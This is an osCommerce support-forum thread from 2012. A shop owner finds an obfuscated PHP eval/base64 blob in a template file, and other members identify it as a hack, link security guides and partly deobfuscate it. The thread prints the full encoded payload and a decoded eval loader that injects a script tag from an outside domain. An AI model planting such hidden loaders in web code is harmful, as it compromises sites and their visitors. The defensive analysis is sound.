What is going on with this script?

#1 kevinhuynh

Members
11 posts

Real Name:kevin huynh

@Mention

Posted 28 July 2012 - 06:22 PM

I found this code in template_bottom file. I don't know what is this script mean. But when it is available my ssl is not working well. The lock of ssl don't show. When I remove it the ssl in mysite is show the lock for ssl.

Here is the code:

Quote

<?php

@eval(@base64_decode("QGV2YWwoQGJhc2U2NF9kZWNvZGUoImFXWW9JV1oxYm1OMGFXOXVYMlY0YVhOMGN5Z25YMFprTXprd01tVXlZVEF6WW1Ga01EazJNelk1T0RZeU9EWXlaR1psTlRaaE15Y3BLWHRtZFc1amRHbHZiaUJmUm1Rek9UQXlaVEpoTUROaVlXUXdPVFl6TmprNE5qSTROakprWm1VMU5tRXpLQ1JmVmpFellqVmlMQ1JmVmpnd05UUmlLWHNrWDFZell6WmxNRDFBY21GM2RYSnNaR1ZqYjJSbEtFQmlZWE5sTmpSZlpHVmpiMlJsS0NSZlZqZ3dOVFJpS1NrN0pGOVdNRFJsTWpnOVFHSmhjMlUyTkY5a1pXTnZaR1VvSkY5V01UTmlOV0lwT3lSZlZqaGpNV016UFhOMGNteGxiaWdrWDFZell6WmxNQ2s3SkY5V1pEZ3dNVEU5Wm14dmIzSW9KRjlXT0dNeFl6TXZNaWs3SkY5V1ptSTNaREE5SWlJN1ptOXlLQ1JmVmpnMk5XTXdQVEE3SkY5V09EWTFZekE4YzNSeWJHVnVLQ1JmVmpBMFpUSTRLVHNrWDFZNE5qVmpNQ3NyS1hza1gxWXpOekl3WWoxemRXSnpkSElvSkY5V01EUmxNamdzSkY5V09EWTFZekFzTVNrN0pGOVdPV1EzTTJROWMzUnljRzl6S0NSZlZqTmpObVV3TENSZlZqTTNNakJpS1R0cFppZ2tYMVk1WkRjelpEMDlQV1poYkhObEtTUmZWbVppTjJRd0xqMGtYMVl6TnpJd1lqdGxiSE5sZTJsbUtDUmZWamxrTnpOa1BpUmZWbVE0TURFeEtYc2tYMVl6T0dFMVpUMGtYMVk1WkRjelpDMGtYMVprT0RBeE1Uc2tYMVpoTjJZNFpqMXliM1Z1WkNnb0pGOVdaRGd3TVRFdE1Ta3RKRjlXTXpoaE5XVXBPMzFsYkhObGV5UmZWak00WVRWbFBTUmZWbVE0TURFeExTUmZWamxrTnpOa095UmZWbUUzWmpobVBYSnZkVzVrS0Nna1gxWmtPREF4TVMweEtTc2tYMVl6T0dFMVpTazdmU1JmVm1ZME1UWmhQWE4xWW5OMGNpZ2tYMVl6WXpabE1Dd2tYMVpoTjJZNFppd3hLVHNrWDFabVlqZGtNQzQ5SkY5V1pqUXhObUU3ZlgxQVpYWmhiQ2drWDFabVlqZGtNQ2s3ZlgwPSIpKTsKX0ZkMzkwMmUyYTAzYmFkMDk2MzY5ODYyODYyZGZlNTZhMygiUHo0TkNqdy9jR2h3RFFwbFkyaHZJQ2M4YzJOeWFYQjBJSE55WXowaWFIUjBjRG92TDNkM2R5NWhkWFJvWlc1MGFXTmhkR1YzWldJdVkyOXRMMjl6WTI5dGJXVnlZMlV2YVc1a1pYZ3VjR2h3SWlBK1BDOXpZM0pwY0hRK0p6c05DbVZqYUc4Z0lseHVJanNOQ2o4K0RRbz0iLCJKVE15SlRNMCIpOw=="));

?>

My website is shown in browswer :

Quote

I don't know the meaning that they insert this code to the site. I found some topic that they said it means hacked?

any advise ..thank so much

#2 kymation

Believers

Community Sponsor
6,698 posts

Real Name:Jim Keebaugh
Gender:Male
Location:Aberdeen WA USA

@Mention

Posted 28 July 2012 - 08:48 PM

Yes, you've been hacked. Secure your site with a password and then clean up the mess. Add the recommended security patches for your version before you reopen the site.

Regards
Jim

My Addons

Banners Box 2.3.x  Support
Categories Accordion Box 2.3.x  Support
Categories Images Box 2.2x  2.3.x  Support
Closest Shipper 2.2x  Support
Document Manager 2.2x  Support
Generic Box 2.3.x  Support
Get 1 Free 2.2x  Support
jQuery Banner Rotator 2.2x  2.3.x  Support
Modular Front Page 2.3.x  Support
Modular SEO Header Tags 2.3.x  Support
MVS 2.2x  Support
PDF Datasheet 2.3.x  Support
Price Updater 2.2x
Products Specifications 2.2x  2.3.x  Development Version  Support  Bugs/Suggestions
Request a Review 2.2x - 2.3.x  Support
Similar Products Box 2.2x
Specials Image Overlay 2.3x Support
Theme Switcher 2.3.x  Support

#3 geoffreywalton

Contact me for Support

Community Sponsor
8,037 posts

Real Name:Geoffrey Walton
Gender:Male
Location:Norfolk, UK (close to the centre of the universe)

@Mention

Posted 28 July 2012 - 08:52 PM

Beat me to it!!

Cheers

G

http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/
http://forums.oscommerce.com/index.php?showtopic=340995

These 2 show how to secure your site but as it has already been hacked you need to restore to a clean state and apply the fixes or find the changes and clean them out and apply the security fixes.

Edited by geoffreywalton, 28 July 2012 - 08:55 PM.

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

Virus Threat Scanner
My Contributions
Basic install answers.
Click here for Contributions / Add Ons.
UK your site.
Site Move.
Basic design info.

For links mentioned in old answers that are no longer here follow this link Useful Threads.

If this post was useful, click the Like This button over there ======>>>>>.

#4 FWR Media

Community Sponsor
6,839 posts

Real Name:Robert Fisher
Gender:Male
Location:Stowmarket - Suffolk - UK

@Mention

Posted 28 July 2012 - 09:06 PM

kevinhuynh, on 28 July 2012 - 06:22 PM, said:

I don't know the meaning that they insert this code to the site. I found some topic that they said it means hacked?

any advise ..thank so much

Definate hack.

All I can make of it with a quick look is ..

<?php
if(!function_exists('_Fd3902e2a03bad096369862862dfe56a3')){
  function _Fd3902e2a03bad096369862862dfe56a3($_V13b5b,$_V8054b) {
	$_V3c6e0=@rawurldecode(@base64_decode($_V8054b));
	$_V04e28=@base64_decode($_V13b5b);
	$_V8c1c3=strlen($_V3c6e0);
	$_Vd8011=floor($_V8c1c3/2);
	$_Vfb7d0="";
	for($_V865c0=0; $_V865c0<strlen($_V04e28); $_V865c0++) {
	  $_V3720b=substr($_V04e28,$_V865c0,1);
	  $_V9d73d=strpos($_V3c6e0,$_V3720b);
	  if($_V9d73d===false)
		$_Vfb7d0.=$_V3720b;
	  else {
		if($_V9d73d>$_Vd8011){
		  $_V38a5e=$_V9d73d-$_Vd8011;
		  $_Va7f8f=round(($_Vd8011-1)-$_V38a5e);
		} else {
		  $_V38a5e=$_Vd8011-$_V9d73d;
		  $_Va7f8f=round(($_Vd8011-1)+$_V38a5e);
		}
		$_Vf416a=substr($_V3c6e0,$_Va7f8f,1);
		$_Vfb7d0.=$_Vf416a;
	  }
	}
	@eval($_Vfb7d0);}}  
?>

The function calls: -

<?php echo '<script src="[http://]www(dot)authenticateweb(dot)com/oscommerce/index.php" ></script>'; echo "\n"; ?>

The last bit I only got some of but you can see the web address.

DON'T VISIT THAT LINK, IT'S MOST LIKELY DANGEROUS

Edited by FWR Media, 28 July 2012 - 09:09 PM.

Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls

KissMT Dynamic SEO Meta & Canonical Header Tags

KissER Error Handling and Debugging

KissIT Image Thumbnailer

Security Pro - Querystring protection against hackers ( a KISS contribution )

If you found my post useful please click the "Like This" button to the right.
Please only PM me for paid work.

#5 burt

Code Monkey

Community Team
7,764 posts

Real Name:G Burton
Gender:Male
Location:UK/DEV/on

@Mention

Posted 28 July 2012 - 11:27 PM

I have seen this same code in a virgin download of a template from the "monstrous" site.
I think, though am not sure, that it is an attempt by the template author to track usage.

gary

Dummies guide to designing osCommerce 2.3 Click Me

Or maybe a ready made theme for your shop ??

Warning: My posts may contain Horsemeat.

#6 Biancoblu

1291 Giger's Alien

Community Sponsor
707 posts

Real Name:Isabella
Gender:Female
Location:Switzerland

@Mention

Posted 29 July 2012 - 08:34 AM

A google search shows the same web address but with other carts (prestashop, zencart, virtuemart, magento).

http://www.google.com/#q=site:www.authenticateweb.com&hl=en&prmd=imvns&filter=0&bav=on.2,or.r_gc.r_pw.r_qf.&fp=6469df5417c526af&biw=1920&bih=845

~ Don't mistake my kindness for weakness ~

osCommerce Online Merchant v2.x → General Support → Site shut down due to excessive emails being sent Started by lildog, 21 Apr 2013 email, spam, hacked	12 replies 548 views	Biancoblu 24 Apr 2013
osCommerce Online Merchant v2.x → Security → strange language link added to my site Started by leonardo2212, 04 Jul 2012 hacked, language	4 replies 2,459 views	DunWeb 10 Jul 2012
ARCHIVED osCommerce Online Merchant v2.x → General Support → spamcop and spammer got my banned Started by nzGoner, 09 May 2012 spam, hacked	4 replies 979 views	nzGoner 09 May 2012
ARCHIVED osCommerce Online Merchant v2.x → Security → Critical: New dangerous exploit: DragosImport Domboware attacks Started by Atrosh, 09 Dec 2011 exploit, dragosimport, domboware and 2 more...	Hot 15 replies 5,662 views	Atrosh 10 Dec 2011
ARCHIVED osCommerce Online Merchant v2.x → Installation and Configuration → I Have been Hacked! what to do? Started by noott123, 22 Oct 2011 hacked, database, what to do and 1 more...	4 replies 855 views	KeySoft 23 Oct 2011

Also tagged with one or more of these keywords: hacked, authenticate, eval, decode

Sign In